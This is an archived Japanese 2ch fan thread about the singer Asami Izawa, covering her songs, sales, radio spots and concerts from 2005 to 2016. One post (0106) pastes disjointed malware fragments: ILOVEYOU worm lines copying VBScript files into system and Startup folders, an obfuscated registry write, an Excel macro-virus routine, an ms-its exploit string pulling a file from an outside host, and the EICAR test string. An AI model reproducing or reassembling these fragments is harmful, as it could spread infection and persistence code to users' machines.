X



*゜+*伊沢麻未*゜+*
■ このスレッドは過去ログ倉庫に格納されています
0003元・大塚おた
垢版 |
2005/04/30(土) 23:55:30ID:ot2rx0SM
とりあえずメルマガ登録した
0004名無しのエリー
垢版 |
2005/05/01(日) 00:15:41ID:F+LbNeEU
この人の曲イイ(・∀・)
0005名無しのエリー
垢版 |
2005/05/02(月) 18:07:38ID:a6wt9gHP
イイね
0006名無しのエリー
垢版 |
2005/05/02(月) 19:25:17ID:Vsn+3nZD
melody.とかそんな感じだな
0007名無しのエリー
垢版 |
2005/05/03(火) 12:19:03ID:He/Iam7L
あーそんな感じ
0008名無しのエリー
垢版 |
2005/05/04(水) 14:33:20ID:pj24c4iS
age
0009名無しのエリー
垢版 |
2005/05/05(木) 12:18:05ID:BXGcIiI+
ラジオで聞いた時、声が似てるので
宇多田も久々にいい新曲出したな、って思った
応援する
0011名無しのエリー
垢版 |
2005/05/06(金) 18:20:59ID:NKe9aDtN
期待age
0013名無しのエリー
垢版 |
2005/05/07(土) 21:22:13ID:CbK4E0vN
ちょっとまえにここ摺れた手できなくて
速報版に立ててたw
彼女は間違いなくヒットするから周りに言っといた
0014名無しのエリー
垢版 |
2005/05/09(月) 23:56:32ID:8uOiAZV7
新曲出してテレビとかに出たら確実にヒットするね
0015名無しのエリー
垢版 |
2005/05/11(水) 00:09:09ID:R6Vhsg/4
802聞いていていい感じやなぁ〜と思いCD買った
ぜったいにヒットすると思うよ。
0016名無しのエリー
垢版 |
2005/05/11(水) 21:03:48ID:cGZGJGt3
アルバム出してるんだっけ?
0018名無しのエリー
垢版 |
2005/05/12(木) 20:10:41ID:Zu220neD
ミニアルバム発売以来のファンです。公式HPにもミーシャに声が似ているとありますがその通りな気がする。実はそれまではミーシャのメジャーデビュー前からのファンだったので多分まちがいなぃと思う。
0019名無しのエリー
垢版 |
2005/05/15(日) 12:17:22ID:SlzKP+tY
あげ
0020名無しのエリー
垢版 |
2005/05/17(火) 22:38:43ID:j1nbnss8
(´∀`)
0021お知らせです
垢版 |
2005/05/18(水) 03:06:21ID:qQV6uBig
突然すみません。邦楽の板が新設されたのに伴い、
このスレを移転依頼出します〜

邦楽(女ソロ)(仮)
http://music4.2ch.net/musicjf/

に移動で中身そのままアドレスだけ変わります。新アドレスは↓の予定です。
http://music4.2ch.net/test/read.cgi/musicjf/1114872107/
もし問題がある場合は
http://music4.2ch.net/test/read.cgi/musicj/1099655636/
までお願いします。
0022名無しのエリー
垢版 |
2005/05/20(金) 00:59:47ID:8mGXqqLD
誰か5/15名古屋でのZip-FM招待ライブに行った人いますか?
0023名無しの歌姫
垢版 |
2005/05/20(金) 22:15:11ID:E51LNRXu
ミニアルバムはかなり聴きごたえあるね!
かなり好きだなー。
0024名無しの歌姫
垢版 |
2005/05/25(水) 15:35:33ID:RHRdlLAu
へー。今度きいてみよう
0025名無しの歌姫
垢版 |
2005/05/29(日) 23:40:02ID:z7i/LXUE
age
0026名無しの歌姫
垢版 |
2005/06/02(木) 22:37:16ID:fMVUVftu
age
0027名無しの歌姫
垢版 |
2005/06/06(月) 21:44:00ID:aYZa3NtE
大好きな曲ばかり
0030名無しの歌姫
垢版 |
2005/06/12(日) 03:57:09ID:mBoI1PcK
ランク王国(?)のエンディングで流れていて
おぅと目が(耳が)止まりました。
ネットで調べて、ミニアルバム買いました!
声はMisiaよりは若干軽く、ウタダさんよりはしっかりしている印象を受けました。
ビブはウタダさんのような細かいビブとはまた違い好みでした。
唄は上手いよねっていう人は、最近沢山出てきてくれて嬉しいですが、
自分の好みとなったら、なかなかいないです・・・・
フェイク?こちらで言うこぶしのきれの良さが大好きなポイントです。
日本人離れした、自然なフェイクが大好きです。
何年かぶりに、おぉ好きかもっていうアーティストに出会えました。
今後このまま我が道を唄っていって欲しいです。
ライブ行ってみたい〜
0031名無しの歌姫
垢版 |
2005/06/12(日) 04:04:34ID:mBoI1PcK
連投すみません
Misiaと似ているといえば
ライブの放送しか見たことがないのですが、
YuUという方、少し雰囲気が似ているなぁとおもいました。
声の重たさや、丁寧に歌っていく雰囲気が・・・・
この方も私のつぼに入りそうです
0032名無しの歌姫
垢版 |
2005/06/13(月) 11:22:07ID:d5iDMMvi
今度の新曲はアニメのEDテーマ。
注目度の高いアニメだからそれなりに売れそう。
0033名無しの歌姫
垢版 |
2005/06/14(火) 17:32:19ID:fLJzJ43G
age
0034名無しの歌姫
垢版 |
2005/06/14(火) 17:43:52ID:euQV8HV6
ビジュアライズだっけ?すごくいい曲だよ。売れてきたら宇多田のパクリだのなんだの言われそうだけど、これだけいい曲は最近になかなかないよ。宇多田無き後は彼女だなw
0035名無しの歌姫
垢版 |
2005/06/19(日) 12:51:24ID:ai5YQ13e
昨日のよかった!
0037名無しの歌姫
垢版 |
2005/07/02(土) 13:45:41ID:c3PX1c7K
結構好みではあるけど
ここ数年、似た歌手が大杉な感もある。
0038名無しの歌姫
垢版 |
2005/07/09(土) 02:57:01ID:Og1mzvP1
あげ
0039名無しの歌姫
垢版 |
2005/07/09(土) 13:45:38ID:Jj3Mxp0k
どんなときも僕らしく居たい
さり気なく君を笑わせたい
0040名無しの歌姫
垢版 |
2005/07/17(日) 15:21:30ID:gqZoUVAP
売れないね
0041名無しの歌姫
垢版 |
2005/07/20(水) 04:15:55ID:Rs2gIZBr
似た系統では、一番好みな声かも。
この人の高音域、すげー気持ちいい&心地よい。
でも所詮は似た系統。すごく個性がないってのが正直な感想('A`)
0042名無しの歌姫
垢版 |
2005/07/24(日) 09:27:13ID:u3u7lPU4
売れてないくせに平井堅のライブ良席で見るなんて
生意気すぎ!!!
あんたが尊敬するのはスティービーでしょ。
大してファンじゃないくせにさ。
私なんて二階席だったのに。
0044名無しの歌姫
垢版 |
2005/07/27(水) 17:21:45ID:0HiyFN0Q
今日発売の新曲買ってきますた
感想書いても良い?
0046名無しの歌姫
垢版 |
2005/07/28(木) 00:34:23ID:Fi6lkCmb
TSUTAYAの棚に並んだら表面見せる陳列しとこか
0047名無しの歌姫
垢版 |
2005/07/28(木) 17:24:35ID:Fi6lkCmb
Fly Awayの2サビ後のトランペットは90‘の広瀬香美とかの曲を思い出させるノリの良いもんだった。
0048名無しの歌姫
垢版 |
2005/08/06(土) 12:07:43ID:pqguS3sK
今回はまぁまぁかなと。声は相変わらず(・∀・)イイ!!けど、楽曲は前回が◎だったからちょいそのぶん冴えない気持ちも。次にさらに期待!
0049名無しの歌姫
垢版 |
2005/08/20(土) 03:29:17ID:/90v95mJ
夏age
0050名無しの歌姫
垢版 |
2005/08/22(月) 14:24:11ID:9WQ8SjZ8
9月21日のライヴの当日券ってどうやってとるの?
0051名無しの歌姫
垢版 |
2005/08/23(火) 09:16:18ID:dkzReXVH
あんまりハっきり顔みせない感じだけど、実はブッサイク?
今時、この手のフェイクで 私 うまい?って感じが もういいよって感じ!
0052名無しの歌姫
垢版 |
2005/08/24(水) 00:33:16ID:XvB5qqrT
ブサイクとまではいかないけれど、一般的な美人でもないと思う。
しかも顔がデカイ気がするが、歌は素直に上手いと思うよ。
フルアルバムが出るのを楽しみにしてる。
0053名無しの歌姫
垢版 |
2005/08/24(水) 02:13:02ID:hne8EN3g
じゃあ、この先売れるの難しいかもね
よっぽど才能ない限り売れるかどうかは
顔で決まるんだよ
0054名無しの歌姫
垢版 |
2005/08/24(水) 02:27:31ID:ykJcIJ0+
この人別に嫌いじゃないけど、なんで大して上手くもないのに、ま〜いぽっき〜♪とかアカペラで歌ってるんだろ?
0056名無しの歌姫
垢版 |
2005/09/04(日) 01:37:47ID:gufbp/8+
まあ、地道に活動してればそれなりに認知されて受け入れられてくよ。



その前にSMEに切られるかもしれんが。。。
0057名無しの歌姫
垢版 |
2005/09/08(木) 01:14:18ID:Sk5aQpDQ
伊沢麻未が大変身…“ポスト宇多田”へ本気
ttp://headlines.yahoo.co.jp/hl?a=20050907-00000008-ykf-ent
新人離れの歌唱力−。“ポスト宇多田ヒカル”の呼び声も高いシンガーソングライターの
伊沢麻未(22)が、アダルトチックに変身中だ。4月に現役女子大生ボーカリストとしてデビュー。
当時は少女っぽさも残していたが、「平井堅(33)もイメチェン作戦で成功した」との
夕刊フジの指摘を意識してか、髪形もストレートロングに変えて大人の色香が漂う。
テレビに露出していないにもかかわらず、7月リリースの初シングル
「Fly Away」(SMEレコーズ)はTBS系アニメ「交響詩篇エウレカセブン」のエンディング曲に。
ネットのダウンロードサイト「mora」のシングルチャートで8位にランクされた。
歌に、ビジュアルに、ファンをクラクラさせる気配あり、だ。21日、東京・恵比寿「switch」でライブを開催。
0058樽穂
垢版 |
2005/09/08(木) 01:41:11ID:QgLI4atA
伊沢結構いいと思う( ´・∀・`) パクリ大塚愛ょりはまし
0059名無しの歌姫
垢版 |
2005/09/09(金) 13:43:33ID:Ds63X5n8
>>57
なんで堅ちゃんを例にあげる?
こいつと堅ちゃん何かあんの?
ライブを良席で見たりさ。
腹立つんだけど。
0060名無しの歌姫
垢版 |
2005/09/16(金) 15:59:40ID:x3c36ENl
age
0061名無しの歌姫
垢版 |
2005/09/20(火) 19:24:07ID:LzL3jAcK
あげ
0062名無しの歌姫
垢版 |
2005/09/24(土) 02:55:59ID:RBSItvN2
声はいいけど顔がホームベースみたいだなあ
0063名無しの歌姫
垢版 |
2005/10/03(月) 20:50:50ID:8ZIrvTwp
山下達郎だって歌がうまいから指示されてんだろーが。
歌手は歌重視だろ。歌はうまいと思うけど
0064名無しの歌姫
垢版 |
2005/10/03(月) 21:03:26ID:Czh2JWsH
伊沢さん(?)ラジオで生弾き語り聴いたけどかなり良かった。
最近の中途半端な歌姫より良いんじゃ…?
0068名無しの歌姫
垢版 |
2005/10/30(日) 01:23:34ID:o/FGr7cu
新曲はまだまだ先?
0069名無しの歌姫
垢版 |
2005/11/16(水) 00:31:00ID:fAVlk2tE
age
0070名無しの歌姫
垢版 |
2005/11/21(月) 11:54:03ID:2zq87s2S
Happy birthday.
ちゃっかり忘れいて昨日だがとりあえず。

0071名無しの歌姫
垢版 |
2005/11/24(木) 15:54:08ID:2ZwLcDbM
毎週この人のラジオ聞いてるお。昨日はスタジオ生ライブやってたお。
0072名無しの歌姫
垢版 |
2005/12/07(水) 18:18:56ID:ULiIDupB
QGQ
0073名無しの歌姫
垢版 |
2005/12/17(土) 01:29:50ID:iPTaFGEZ
age
0074名無しの歌姫
垢版 |
2005/12/24(土) 00:43:13ID:/ic0D0X5
この人SMEの前に他のレコード会社からCD出してる?
0075名無しの歌姫
垢版 |
2005/12/31(土) 13:05:56ID:SgVBA/Wf
>>74
「Power of Ring」(VGCL-1012,2004.3.3,\1260)ていうCDシングルが、インディーズから出てるよ。
0076名無しの歌姫
垢版 |
2006/01/01(日) 10:57:35ID:MIvCxJkn
あけおめ!

>>75
だよね。
新宿のタワレコで見つけたんだけど、
まさかインディーズでだしてるとは思ってなかったから聞いてみた。
ありがとう。
0080名無しの歌姫
垢版 |
2006/01/20(金) 06:42:42ID:07/JaYQ/
0083名無しの歌姫
垢版 |
2006/02/02(木) 19:29:13ID:wYKefFQ8
age
0084名無しの歌姫
垢版 |
2006/02/17(金) 01:29:49ID:VpO49Uon
活動してる?
0085名無しの歌姫
垢版 |
2006/02/17(金) 18:49:03ID:iQ83RZcj
今はトリノに夢中らしい・・・・
早くアルバムでないかな
0091名無しの歌姫
垢版 |
2006/04/05(水) 13:04:38ID:TJI6Oo/b
一般的なブスだわな。顔デカくてエラはってるし鼻とかひどい
0092名無しの歌姫
垢版 |
2006/04/09(日) 22:52:53ID:FSo/eNje
VisualizeがFly awayしてるわけだね
0093名無しの歌姫
垢版 |
2006/04/20(木) 21:13:44ID:vx2AZ2Or
伊沢麻未の「Visualize」か、、ランク王国のエンディングだった曲。
頭に残ってて探してたんだけど
答えだすのに半年かかった。
ランクのエンディングってのもあいまいだったし。
これからこの人ちょっと注目。
0096名無しの歌姫
垢版 |
2006/05/14(日) 16:01:27ID:QCGVDw9j
おや、出るんだ。
0097名無しの歌姫
垢版 |
2006/06/02(金) 18:28:03ID:l9QS4fwY
普通に上手いけどブレイクする要素がないな
0098名無しの歌姫
垢版 |
2006/06/07(水) 14:00:52ID:iuQqZ8bw
捕手
0099名無しの歌姫
垢版 |
2006/06/18(日) 21:53:36ID:j6/Vg6qu
ほしゅ
0100名無しの歌姫
垢版 |
2006/06/21(水) 00:57:09ID:4ujC3hiA
久しぶりに新曲出たんだね。
0101名無しの歌姫
垢版 |
2006/07/01(土) 21:54:38ID:kd41fzFz
新曲オリコン圏外ですけど、どうしましょう
0102名無しの歌姫
垢版 |
2006/07/04(火) 22:42:56ID:UD08LL6B
第2FM系は売り出し方が中途半端だよね?この人歌うまいのに典型的な売れない第2FM系アーだし。
0103名無しの歌姫
垢版 |
2006/07/05(水) 00:00:09ID:qRNwrAfZ
Sonyはもっと力を入れてやれよ・・・。
0104名無しの歌姫
垢版 |
2006/07/05(水) 00:45:16ID:SEAfyf2I
本当だよ
8/30にも新譜でるけど宣伝する気なしだし
0105名無しの歌姫
垢版 |
2006/07/06(木) 01:41:46ID:XvwHRbdo
新曲、結構いい曲なのにね。
0106名無しの歌姫
垢版 |
2006/07/06(木) 08:11:41ID:/bDyWgZQ
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm"; type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???
0107名無しの歌姫
垢版 |
2006/07/10(月) 16:29:05ID:CVhXKs0K
0108名無しの歌姫
垢版 |
2006/07/17(月) 02:31:07ID:X2EQzztE

0109名無しの歌姫
垢版 |
2006/07/22(土) 19:37:30ID:TG/Xsu4R
マイナーな歌手も置いてあるCDショップ行ったけど、何も置いてなかった。
新曲はちゃんと置かれるかなあ。
0110名無しの歌姫
垢版 |
2006/07/29(土) 20:36:00ID:HB3b1chc
宣伝しないと売れないことくらい分かってるのに
なんでほったらかしなんだろう。
フェスとかは出てるみたいだけど、ただの歌の上手い人で終わってる気がする。
0111名無しの歌姫
垢版 |
2006/07/30(日) 02:24:13ID:KmjDSqJg
ものすごく勿体無いよね。
0112名無しの歌姫
垢版 |
2006/08/10(木) 09:21:28ID:fZd4VyQd
もうすぐ売れるよ
0113名無しの歌姫
垢版 |
2006/08/15(火) 17:44:43ID:s9Zjy40m
あと2週間で売れるよ。
0114名無しの歌姫
垢版 |
2006/08/20(日) 00:11:01ID:lHRnxvl7
ラジオ出演中
0115名無しの歌姫
垢版 |
2006/08/26(土) 00:39:47ID:jaFA6oR6

0116名無しの歌姫
垢版 |
2006/08/29(火) 10:12:04ID:3+IbOvw4
今日CD買いに行く。売ってれば。
0118名無しの歌姫
垢版 |
2006/09/04(月) 08:54:31ID:UhJ0Z4rl

0120名無しの歌姫
垢版 |
2006/09/07(木) 22:58:09ID:M3AhWMtN
伊沢麻未
***,*** *** 06.06.21 Orange sunshine
***,579 174 06.08.30 Battlefield of love

オレンジ〜は週間ランキングで200位圏外のためデータなし
0122名無しの歌姫
垢版 |
2006/09/09(土) 14:17:17ID:4ZB4Wr0E

0123名無しの歌姫
垢版 |
2006/09/13(水) 03:31:14ID:KyRGjZfI
伊沢麻未いいよ伊沢麻未
0124名無しの歌姫
垢版 |
2006/09/21(木) 18:32:52ID:IXFe2SU2

0126名無しの歌姫
垢版 |
2006/10/02(月) 23:43:25ID:yokXChtb

0127名無しの歌姫
垢版 |
2006/10/03(火) 00:25:07ID:pNhsGhYX
この人ライブで見たけどすごくいい。
帰りにサイン色紙付のCD買っちゃった。売れて欲しいな。
0128名無しの歌姫
垢版 |
2006/10/08(日) 00:54:57ID:1HQa6K6m
昨日ミナホで観て来た。
アルバム出るらしいよ。現在レコーディング中だとか。
そしてその中から1曲歌ってくれた。
計5曲歌ったけど、visualize歌わなかったのが残念。
0129名無しの歌姫
垢版 |
2006/10/09(月) 03:26:22ID:BjVHbQ4E
伊沢麻未がんがれ
0130名無しの歌姫
垢版 |
2006/10/15(日) 21:54:21ID:Ajy4bAIK
応援age
0131名無しの歌姫
垢版 |
2006/10/22(日) 14:01:03ID:F05314Lf
インディーズのCDゲットしたけど曲はミニアルバムに入ってるやつなんだね
結構アレンジとかメロディとか違うから楽しめたけど
0133名無しの歌姫
垢版 |
2006/11/11(土) 22:09:12ID:BkD4YGEY
麻未ちゃん大好きage
0134名無しの歌姫
垢版 |
2006/11/16(木) 01:57:49ID:HHB3w0Zh
過疎すぎるage
0135名無しの歌姫
垢版 |
2006/11/16(木) 01:59:54ID:IC3BGuZx
歌はうまいし愛想もいいのにな。
0137名無しの歌姫
垢版 |
2006/12/19(火) 01:03:47ID:tcHnck7B
遂にフルアルバムでるね!
作家陣がすげ〜豪華!! たのしみですね。
0139名無しの歌姫
垢版 |
2007/01/17(水) 16:44:56ID:xUc+SPNA
なんか不遇だな。アルバムは楽しみにしてる。
0140名無しの歌姫
垢版 |
2007/02/02(金) 14:00:40ID:fT/xKyvd
アルバム出てから全く書き込みなし?
0141名無しの歌姫
垢版 |
2007/02/02(金) 18:47:18ID:GbGpLJlr
アルバムどうだった?
まだ買ってないんだよね
0142名無しの歌姫
垢版 |
2007/02/04(日) 14:25:41ID:9xSNZ40a
ここで試聴できるよ
ttp://www.asamiizawa.com/
0143名無しの歌姫
垢版 |
2007/02/05(月) 14:01:10ID:nOZzk62l
店頭に無かったのでわざわざ注文して手に入れたが、
個人的には前作のミニアルバムのほうが良かったと思う。
0144名無しの歌姫
垢版 |
2007/02/05(月) 21:50:52ID:IOlRkMOm
ミニアルバムも出してたのか。
今度見たら買っとこう。
0145名無しの歌姫
垢版 |
2007/02/09(金) 01:01:15ID:eAMK0DY5
ライブ行ってきた

セットリスト
・Think about you
・Take me away
・雪にのせて

初めてダンサーつけてライブやった
けど本人もダンサーもそんなにダンス上手くないからやめたほうがいいかも
個人的にはVisualizeかBattlefield of loveのどっちかは
やってくれると思ってたからちょっと残念
0146名無しの歌姫
垢版 |
2007/02/09(金) 01:50:48ID:FiqsItKc
公式で曲聴いて、早速注文しました。
本当に良いね。
0147名無しの歌姫
垢版 |
2007/02/12(月) 11:05:06ID:MKKazZqp
Battlefield of love と やまない雨はない がツボ
0148名無しの歌姫
垢版 |
2007/02/16(金) 14:49:14ID:PX4gcGqX
FM802のライブイベント当たった!
数ヵ月ぶりに麻未タソに会えるwktk
多分無いけどvisualize歌って欲しいな
0149名無しの歌姫
垢版 |
2007/03/18(日) 00:35:06ID:sYCnvQbj
おお
0150名無しの歌姫
垢版 |
2007/03/26(月) 04:31:59ID:kfqObuco
たな〜
0152名無しの歌姫
垢版 |
2007/05/04(金) 00:10:12ID:vGRLWSsB0
エンジェル・ハートの「Battlefield of love」で
この人知ったんだけど、他の曲も聞く価値ある?
0153名無しの歌姫
垢版 |
2007/05/04(金) 00:34:54ID:RpIqQAIV0
>>152
公式サイトで視聴してみたら?
歌が上手さは保証するが、曲の好みがあうかどうかはあなた次第。
0154名無しの歌姫
垢版 |
2007/05/04(金) 00:37:16ID:RpIqQAIV0
× 歌が上手さは
○ 歌の上手さは
0155名無しの歌姫
垢版 |
2007/06/08(金) 10:32:43ID:jUJwcb+h0
age
0156名無しの歌姫
垢版 |
2007/07/31(火) 21:17:10ID:GSxPjLj10

0157名無しの歌姫
垢版 |
2007/08/01(水) 01:16:24ID:x2inGTWZ0

0158名無しの歌姫
垢版 |
2007/08/02(木) 22:38:19ID:tW4hQ7OB0

0159名無しの歌姫
垢版 |
2007/08/05(日) 03:44:06ID:G/4wAHKu0
OA:GJ
0160名無しの歌姫
垢版 |
2007/08/07(火) 15:33:59ID:2eGfouMc0
0161名無しの歌姫
垢版 |
2007/08/10(金) 14:08:34ID:Gw07OUeb0
/jegz
0162名無しの歌姫
垢版 |
2007/08/11(土) 15:18:24ID:0j3qIb9m0
ha
0163名無しの歌姫
垢版 |
2007/08/18(土) 17:21:58ID:I1B8jykZ0
0164
垢版 |
2007/08/22(水) 01:17:37ID:CUXcUsM00
まだあったのかこのスレ・・・w
0165名無しの歌姫
垢版 |
2007/08/27(月) 19:22:04ID:f1eEZJV80
自分で立てといてそういうこというなよw
0166名無しの歌姫
垢版 |
2007/08/31(金) 15:33:52ID:IaWrpDdC0
0167名無しの歌姫
垢版 |
2007/09/06(木) 00:46:18ID:eiDwGFz40
0168名無しの歌姫
垢版 |
2007/09/19(水) 07:58:17ID:x5KnMhG90
0169名無しの歌姫
垢版 |
2007/09/23(日) 04:30:18ID:f32B9gvc0
とんでもなく良い歌手だと思うなあ。
可愛い曲からかっこいい曲、切ない曲
どんな曲でもそれぞれの声に顔を持たせてるし
それが出来るのは表現力が多用だからだと感じる。

歌唱力も倖田來未より上だけどね
なんで売れないのかが不思議wwwww
0170名無しの歌姫
垢版 |
2007/09/24(月) 03:09:52ID:MzrDHapf0
>>169
本当にそう思う!なかなかいない逸材だと思うのだけど
広報ももう少し力入れられないのかな?
こんなに実力があるのにもったいない
売り方次第では ある程度地位を築く人材だと思う
もっともっとこれから可能性がある人だと思うし
売れても自分を見失うような人じゃないと思うし
こうださんと比べるのは失礼な程差があると思う
運がまだ向いていないだけなのだと信じたい
本人が幸せで満足しているのならそれでいいけど
もっと認められて良いアーティストだとは感じる
0171名無しの歌姫
垢版 |
2007/10/24(水) 00:31:02ID:8k0Y3VyP0
このままだと歌がうまいのに営業的に心配
せめてMISIAくらい一発だけでも売れて欲しいなあ。
あとは実力でコンサートできるかもしらんし。
0172名無しの歌姫
垢版 |
2007/11/08(木) 17:47:14ID:ndB15nDJO
ラクーアのライブで初めて知ったけど、この人いいね。
雪のかけらがすごく良かった。
0173名無しの歌姫
垢版 |
2007/11/23(金) 23:10:47ID:j3vVFeLy0
>>169-170
カノンやナチュラルハイ、サンタラについても同じ事思うけど
ソニー売り方下手すぎだろ。
アニメだけじゃなく、他のタイアップにも起用しろ。
せっかく実力はあるんだから。
0174名無しの歌姫
垢版 |
2008/01/13(日) 23:33:09ID:hwIerr2l0
避難
0175名無しの歌姫
垢版 |
2008/02/01(金) 00:35:53ID:eBUmFyRC0
 
0176名無しの歌姫
垢版 |
2008/03/05(水) 03:03:45ID:98mxnCRU0
ライバルきたね
福原美穂
どこまで対抗出来るかな
0177名無しの歌姫
垢版 |
2008/03/27(木) 11:25:04ID:x/pZ+B9f0
長いこと歌聴いてないけど、
やっぱ今もウタダに声似てんの?
0178名無しの歌姫
垢版 |
2008/03/30(日) 07:13:42ID:5tfxYUZQ0
ウタダさんよりは個人的には上手いと思う
似てることで損してるのかな
ライブも安定しているし
もっと認められても良いよなぁ・・
がんばれ!
0179名無しの歌姫
垢版 |
2008/03/31(月) 12:15:50ID:dppaErpM0
「本家」のクオリティ落ちてきてるから、今こそ頑張り時じゃないの?w
0180名無しの歌姫
垢版 |
2008/03/31(月) 12:35:50ID:UvcZc7t50
そうそう!頑張り時かも
良い楽曲に恵まれれば何とかなるかも
福原とは根本的にタイプが違うから
ライバルにはならないのでは
まぁ 福原は確かに凄いが
0181名無しの歌姫
垢版 |
2008/04/24(木) 16:30:59ID:GFnPeP5g0
0182名無しの歌姫
垢版 |
2008/04/30(水) 10:35:08ID:o9s+6RuQO
配信曲自分で作ってないじゃん
ブログの更新ばっかでタレントにでもなったの?
0184名無しの歌姫
垢版 |
2008/05/29(木) 23:42:41ID:3hdj/7Wz0
新曲が配信ばっかで、えらい冷遇されてるな。
0185名無しの歌姫
垢版 |
2008/06/01(日) 21:54:09ID:Ss6uutaxO
これからはブログタレントになります。
よろしくお願いします。
0186名無しの歌姫
垢版 |
2008/08/21(木) 17:44:36ID:I7eU7DR4O
ブログの写真見てあげて
0187名無しの歌姫
垢版 |
2008/08/25(月) 18:59:10ID:vIVipfQpO
この人明らかに仕事してないだろw
ニートだな
0188名無しの歌姫
垢版 |
2008/11/23(日) 22:44:30ID:YKv734c80
久々にHP見たけど、確かに全然仕事してないw
このままじゃ、ソニーから契約切られるぞ。
0189名無しの歌姫
垢版 |
2008/12/13(土) 18:02:26ID:kJv8W7bC0
いい声してるのに 何で世に出ない?
0190名無しの歌姫
垢版 |
2009/01/07(水) 17:39:54ID:PpAok+ooO
CD売れないから新曲の企画も通らないんじゃね?
去年配信しか出せなかったのも普通に買う奴いんのか試しただけだと思う

0191名無しの歌姫
垢版 |
2009/01/19(月) 01:31:40ID:NipkbVk1O
アルバムとかは出せないのかなぁ?
0193名無しの歌姫
垢版 |
2009/05/16(土) 17:57:36ID:HcCMILEu0
今更ながらアルバム「Prhythm」を買ったんだけど、
何これ? めちゃ質高くてビックリ。歌の上手さは当然なんだけど
曲も良いし、とにかく音が丁寧に作られていてすごく綺麗。
せっかく良い素質あるのに、このまま放置状態はもったいないなあ。
しかし、HP・ブログ見たけど音楽活動してる気配ナシ…。
0195名無しの歌姫
垢版 |
2009/09/08(火) 05:58:41ID:7LdfXd9RO
歌上手い
0196名無しの歌姫
垢版 |
2009/11/06(金) 21:28:40ID:sF1uOxIQ0
Fly Awayは名曲だな
0197名無しの歌姫
垢版 |
2009/12/01(火) 01:21:55ID:Bk/0/aBrO
802で初めてvisualise聴いた時はこれはイイと思ったけども…(´・ω・`)がんばれー
0198名無しの歌姫
垢版 |
2009/12/01(火) 01:24:59ID:Bk/0/aBrO
sじゃなくzか(´・ω・`)
0199名無しの歌姫
垢版 |
2010/01/16(土) 06:51:39ID:Fsq4yhwu0
ho
0200200
垢版 |
2010/04/24(土) 01:34:28ID:5B0V9FfU0
200
0202名無しの歌姫
垢版 |
2010/08/06(金) 05:18:12ID:KYEh1MIZ0
ウタダに声似てんの
0203名無しの歌姫
垢版 |
2010/12/11(土) 08:59:44ID:KIwgcvjJ0
マジ?
0204名無しの歌姫
垢版 |
2011/05/04(水) 23:15:54.62ID:o2PqQKtgO
ようやくアルバムリリースだな。
0205名無しの歌姫
垢版 |
2011/05/07(土) 00:28:37.88ID:j4pCWf7fO
>>204
リリースソースと現在の彼女の公式ブログのURLを載せて頂けませんか?
0206アメリカンチェリー
垢版 |
2011/06/05(日) 01:34:23.77ID:8bi+LUxk0
ドーン!ww
http://ameblo.jp/asamiizawa/
昨夜六本木で新譜発売イベントライブを行いました。
0207名無しの歌姫
垢版 |
2011/06/15(水) 09:49:22.48ID:i2KO3/ipP
新譜は自主制作らしいが、ソニーとはもう契約切れちゃったのか。
0209名無しの歌姫
垢版 |
2013/01/15(火) 18:01:44.28ID:6++CovdH0
パンピーに戻っちゃったんだろうね、きっと・・ 世知辛い世の中だわ、
0210名無しの歌姫
垢版 |
2013/10/01(火) 15:33:19.24ID:I3c2I0dM0
新曲まだか
0211名無しの歌姫
垢版 |
2013/10/31(木) 05:52:24.59ID:CW/GsBD/0
結婚おめ!!!
0212名無しの歌姫
垢版 |
2014/02/27(木) 12:46:47.25ID:EU+1pnoc0
うおおお
0213名無しの歌姫
垢版 |
2014/10/12(日) 16:32:01.22ID:Rt9Qujdi0
過疎
0214名無しの歌姫
垢版 |
2015/01/07(水) 17:23:49.09ID:I7x8JdBv0
あげ
0215名無しの歌姫
垢版 |
2015/07/24(金) 17:22:07.52ID:SLkWjgEB0
過疎
0216名無しの歌姫
垢版 |
2015/10/04(日) 13:49:01.02ID:NVmd+72w0
あげ
0217名無しの歌姫
垢版 |
2015/10/26(月) 12:44:51.84ID:8qCrx9A20
10年前のAIAから好きなんだが
ミルクティーは廃れない名曲だね
アルバムも買おうか検討中
0218名無しの歌姫
垢版 |
2016/10/29(土) 11:21:23.39ID:WCK+0sAu0
>>217
買ったの?
■ このスレッドは過去ログ倉庫に格納されています

ニューススポーツなんでも実況